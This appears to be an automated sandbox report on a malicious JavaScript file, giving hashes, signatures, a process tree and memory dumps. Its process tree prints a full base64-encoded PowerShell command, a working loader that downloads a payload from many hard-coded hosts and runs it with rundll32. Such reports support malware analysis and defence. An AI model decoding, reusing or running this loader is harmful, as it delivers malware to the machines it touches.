Overview

overview

8

Static

static

1

a4Shj8mMCjLAS9.js

windows7-x64

1

a4Shj8mMCjLAS9.js

windows10-2004-x64

8

Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    14/06/2023, 07:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a4Shj8mMCjLAS9.js

  • Size

    366KB

  • MD5

    102c38ddb3bc1cae7fbf642676d7b94b

  • SHA1

    894d9bf093eebe44c0ce219d22055ed7ab965453

  • SHA256

    cea0787fe709eb7bd1f4572d915f64c70f3fb2d0467373885c3f452c7b7064f7

  • SHA512

    fb08b0171456e7084979882794347c8dd9aece92c6d472866de9d4f3ff89e270753d20699bb970fa43299c049be142a4511f51058fdad49e4aabe02fd6a5cc58

  • SSDEEP

    6144:bSfr0dh2tgcH6YTkM0cNRcpZwg/EBQ+8N/ygD1pRbse+N5odTxV/hS:bSfrSh2tgcH6YTkMXRcpZwg/QQ+I/ygw

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\a4Shj8mMCjLAS9.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:948
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABmAG8AcgBlAGIAbwBkAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAFEAQQBOAGcAQQB1AEEARABZAEEATQBnAEEAPQBhAFUAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AZwBBADAAQQBEAFUAQQBMAGcAQQA1AEEARABNAEEAYQBVAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB5AEEARwBFAEEAYgBnAEIAawBBAEcARQBBAGIAQQBBAHUAQQBIAFEAQQBaAFEAQgBoAEEARwAwAEEAIgA7ACQAZQBtAGEAbgBhAHQAaQBvAG4AUABoAG8AYwBpAG4AYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeQBBAEQASQBBAE4AZwBBAD0AdwBwAEMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANABBAEMANABBAE4AUQBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABjAEEATABnAEEAeABBAEQAawBBAE8AQQBBAD0AdwBwAEMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAFEAQQAyAEEARABBAEEATABnAEEAeQBBAEQAUQBBAE4AZwBBAD0AdwBwAEMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBDAEEARwBVAEEAYwB3AEIAMABBAEcAawBBAFkAUQBCAHMAQQBHAGsAQQBkAEEAQgA1AEEAQwA0AEEAZABRAEIAcgBBAEEAPQA9ACIAOwAkAGEAYwBjAGUAcwBzAGEAcgBpAGwAeQBBAG4AdABpAHAAcgBpAG4AYwBpAHAAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgBBAEEAdQBBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBNAEEAQQAzAEEAQwA0AEEATwBRAEEAeABBAEMAOABBAGMAUQBCAHQAQQBGAE0AQQBMAHcAQgAzAEEARQBnAEEAVwBBAEEAeQBBAEYAZwBBAHoAcABCAEMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBWAEEARwA0AEEAWgBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAZABnAEIAcABBAEcAdwBBAGIAQQBCAGgAQQBIAE0AQQBMAHcAQgB0AEEARgBvAEEATgBnAEIATQBBAEUANABBAEwAdwBCAHcAQQBHADQAQQBWAGcAQgBoAEEARgBvAEEAegBwAEIAQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADAAQQBIAEkAQQBZAFEAQgBqAEEARwBnAEEAYgB3AEIAdABBAEcARQBBAFMAQQBCADUAQQBIAEEAQQBiAHcAQgAwAEEASABJAEEAYgB3AEIAagBBAEcAZwBBAGIAdwBCAHAAQQBHAFEAQQBMAGcAQgAzAEEARwA4AEEAYwBnAEIAcgBBAEgATQBBAEwAdwBCAE0AQQBHAG8AQQBjAEEAQgBEAEEAQwA4AEEAWQB3AEIANQBBAEQAUQBBAFUAZwBBAD0AegBwAEIAQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATwBBAEEAdQBBAEQARQBBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIATgBBAEYARQBBAFMAQQBBADIAQQBGAE0AQQBMAHcAQgB2AEEARQA0AEEAWgBnAEIAVwBBAEcARQBBAHoAcABCAEMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAZABBAEIAdgBBAEgAQQBBAFkAZwBCAHYAQQBHAEUAQQBjAGcAQgBrAEEARQBFAEEAYwBBAEIAbwBBAEcAVQBBAGIAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQB2AEEARgBvAEEATAB3AEIAMQBBAEUATQBBAHoAcABCAEMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgB3AEEAdwBBAEMAOABBAFkAdwBCAEUAQQBGAE0AQQBkAFEAQgBIAEEARwBJAEEATAB3AEEAMQBBAEQAZwBBAGMAZwBCAEMAQQBHAFEAQQBOAHcAQgBoAEEARABBAEEAZAB3AEIASABBAEQAQQBBAGUAZwBBAD0AegBwAEIAQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA1AEEAQwA4AEEATgB3AEIANABBAEgAWQBBAGIAZwBCAG8AQQBEAEUAQQBXAFEAQQB2AEEARQBJAEEAVgBRAEIAWQBBAEQAUQBBAFoAZwBCAFUAQQBIAEEAQQB6AHAAQgBDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE0AUQBBADAAQQBDADgAQQBPAEEAQgBDAEEASABvAEEATAB3AEEAegBBAEYAQQBBAE4AdwBCAFoAQQBHAGMAQQBUAEEAQgBNAEEASABRAEEAYQB3AEIATABBAEEAPQA9ACIAOwAkAFMAdQByAGUAbgBlAHMAcwBEAGkAZQB0AGEAcgBpAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEgAVQBBAGIAZwBCADAAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAGwAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFUAQQBMAGcAQQAwAEEARABNAEEATABnAEEAeABBAEQAQQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQB3AEEAQQA9AD0AbABQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAWQBBAEwAZwBBADEAQQBEAEUAQQBMAGcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQAawBBAE4AQQBBAD0AbABQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUANABBAGIAdwBCAHUAQQBHAFUAQQBkAEEAQgBvAEEARwBrAEEAWQB3AEIAaABBAEcAdwBBAGIAQQBCADUAQQBDADQAQQBkAHcAQgBsAEEARwBJAEEAYwB3AEIAcABBAEgAUQBBAFoAUQBBAD0AIgA7ACQAYwBhAHIAZwBhAHMAbwBuAE4AbwBuAHYAaQBzAGkAYgBpAGwAaQB0AGkAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAzAEEARABjAEEATABnAEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABFAEEATgBnAEEAdwBBAEEAPQA9AD0ARABzAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEUAQQBNAEEAQQA0AEEAQwA0AEEATQBRAEEANQBBAEQAWQBBAEwAZwBBADMAQQBEAE0AQQA9AEQAcwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBNAFEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABRAEEAIgA7ACQAcAByAGkAZQBzAHQAYwBhAHAAUwB0AHIAZQBwAHQAbwB0AHIAaQBjAGgAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAegBBAEMANABBAE0AUQBBADIAQQBEAEEAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQAWQBBAE0AUQBBAD0ATQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGIAdwBCAHYAQQBIAFEAQQBhAEEAQgBoAEEARwBNAEEAYQBBAEIAcABBAEcANABBAFoAdwBCAEkAQQBHAFUAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAegBBAEgAUQBBAGMAZwBCAGwAQQBIAE0AQQBjAHcAQgBsAEEASABNAEEATABnAEIAaABBAEcAYwBBAFoAUQBCAHUAQQBHAE0AQQBlAFEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFIAbwB1AHQAaQBuAGUAbAB5ACAAaQBuACAAJABhAGMAYwBlAHMAcwBhAHIAaQBsAHkAQQBuAHQAaQBwAHIAaQBuAGMAaQBwAGwAZQAgAC0AcwBwAGwAaQB0ACAAIgB6AHAAQgBDACIAKQAgAHsAdAByAHkAIAB7ACQAYgBpAHMAdAByAGEAdABvAHMAZQBSAGUAcABpAHQAYwBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABZAEEATABnAEEAeQBBAEQASQBBAE4AUQBBAHUAQQBEAEUAQQBOAEEAQQB6AEEAQwA0AEEATwBRAEEAMABBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADAAQQBEAEEAQQBMAGcAQQAwAEEARABBAEEATABnAEEANQBBAEQASQBBACIAOwAkAE8AcABwAGkAYQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATQB3AEEAdQBBAEQARQBBAE0AdwBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABBAEEATABnAEEAeQBBAEQASQBBAE0AUQBBAD0ASgBWAGMAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAFUAQQBjAGcAQgA1AEEASABRAEEAYQBBAEIAdABBAEcAawBBAFkAdwBCAHoAQQBFAFEAQQBaAFEAQgAyAEEARwA4AEEAZABBAEIAcABBAEcANABBAFoAdwBBAHUAQQBIAFEAQQBZAFEAQgA0AEEARwBrAEEASgBWAGMAZQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABFAEEATwBRAEEAegBBAEEAPQA9AEoAVgBjAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAWQBRAEIAagBBAEcAcwBBAGIAQQBCAHAAQQBHADQAQQBaAHcAQgBOAEEARwA4AEEAYgBnAEIAdgBBAEcATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBwAEEASABNAEEAZABBAEEAdQBBAEcAUQBBAFoAUQBCADIAQQBBAD0APQAiADsAJABEAGUAdAByAGEAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAHYAQQBIAFUAQQBiAGcAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEgAUQBBAGQAdwBBAD0AUwBnAHoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBDAEEARwB3AEEAWQBRAEIAegBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBsAEEAQwA0AEEAYgBRAEIAbABBAEEAPQA9AFMAZwB6AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEcAOABBAGMAdwBCADAAQQBHADQAQQBZAFEAQgAwAEEARwBFAEEAYgBBAEEAdQBBAEcAMABBAGEAUQBCAGgAQQBHADAAQQBhAFEAQQA9AFMAZwB6AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAUQBBAE0AQQBBAHUAQQBEAEUAQQBOAEEAQQAyAEEAQwA0AEEATgB3AEEAeQBBAEMANABBAE8AQQBBAHgAQQBBAD0APQAiADsAJABpAG4AYwB1AGwAYwBhAHQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUgBvAHUAdABpAG4AZQBsAHkAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABpAG4AYwB1AGwAYwBhAHQAaQBuAGcAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAbgBvAG4AYwBvAG4AYwBsAHUAcwBpAG8AbgAuAGYAcgBlAGEAawB5AFIAZQBkAGMAbwBhAHQAOwAkAEkAbgB0AGUAcgBlAHMAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBOAFEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBPAFEAQQB5AEEAQQA9AD0AIgA7ACQAUwBvAHUAbgBkAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATwBRAEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQB4AEEARABFAEEATABnAEEAeQBBAEQATQBBAE4AUQBBAD0AIgA7ACQAawBlAHQAbwBnAGUAbgBpAGMARgByAG8AdwBzAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGIAdwBCAHkAQQBHADQAQQBZAFEAQgBqAEEARwBrAEEAWQB3AEEAdQBBAEcAUQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AUABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AUQBBAHUAQQBEAEkAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEAMgBBAEQAWQBBAEwAZwBBAHgAQQBEAGsAQQBNAFEAQQA9AFAAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBlAFEAQgB0AEEASABBAEEAYQBBAEIANQBBAEgATQBBAFoAUQBCAGgAQQBHAHcAQQBVAHcAQgB3AEEARwA4AEEAZABRAEIAegBBAEcAVQBBAGEAQQBCAHYAQQBHADgAQQBaAEEAQQB1AEEARwAwAEEAYQBRAEIAaABBAEcAMABBAGEAUQBBAD0AUABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHkAQQBDADQAQQBNAFEAQQB6AEEARABRAEEATABnAEEAeABBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQA1AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAbgBvAG4AYwBvAG4AYwBsAHUAcwBpAG8AbgAuAGYAcgBlAGEAawB5AFIAZQBkAGMAbwBhAHQAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADEAMAAwADgANgApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYgBnAEIAdgBBAEcANABBAFkAdwBCAHYAQQBHADQAQQBZAHcAQgBzAEEASABVAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAFkAQQBjAGcAQgBsAEEARwBFAEEAYQB3AEIANQBBAEYASQBBAFoAUQBCAGsAQQBHAE0AQQBiAHcAQgBoAEEASABRAEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABpAG0AcABlAHIAYwBlAGkAdgBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAWgBnAEIAaABBAEcATQBBAGQAQQBCAHYAQQBIAEkAQQBVAHcAQgBvAEEARwBFAEEAWgBBAEIAdgBBAEgAYwBBAGEAUQBCAHUAQQBHAGMAQQBMAGcAQgBuAEEARwBrAEEAWgBnAEIAMABBAEgATQBBAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAZABRAEIAbQBBAEcAWQBBAGIAQQBCAGgAQQBIAFEAQQBaAFEAQgBRAEEARwBVAEEAYwBnAEIAcABBAEgAWQBBAGEAUQBCAHoAQQBHAE0AQQBaAFEAQgB5AEEARwBFAEEAYgBBAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBsAGEAcABzAHQAaQBjAGsARQBzAHQAaQBtAGEAdABpAG8AbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcASQBBAGUAUQBCAHMAQQBHAEUAQQBkAHcAQgB0AEEARwBFAEEAYgBnAEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AYgBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAZwBBAE4AZwBBAHUAQQBEAEUAQQBNAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADEAQQBEAEUAQQAiADsAJABCAGkAYgBsAGkAbwBsAGEAdAByAG8AdQBzAFMAYQByAGsAaQB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwB3AEEAWgBRAEIAdQBBAEcARQBBAGMAZwBCADAAQQBIAGsAQQBSAGcAQgBzAEEARwBFAEEAYwB3AEIAbwBBAEcAWQBBAGIAQQBCAHYAQQBHADgAQQBaAEEAQQB1AEEASABBAEEAYQBRAEIAagBBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQBjAHcAQQA9AGcAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEEAPQA9AGcAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFkAQQBiAHcAQgB5AEEARwBVAEEAWQBnAEIAcABBAEgAUQBBAGQAQQBCAGwAQQBIAEkAQQBWAHcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEgATQBBAGEAQQBBAHUAQQBHAEkAQQBZAFEAQgB5AEEARwBNAEEAWgBRAEIAcwBBAEcAOABBAGIAZwBCAGgAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1764

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1764-58-0x000000001B340000-0x000000001B622000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1764-59-0x0000000002510000-0x0000000002518000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1764-60-0x0000000002750000-0x00000000027D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1764-61-0x0000000002750000-0x00000000027D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1764-62-0x0000000002750000-0x00000000027D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1764-63-0x000000000275B000-0x0000000002792000-memory.dmp

    Filesize

    220KB

    Download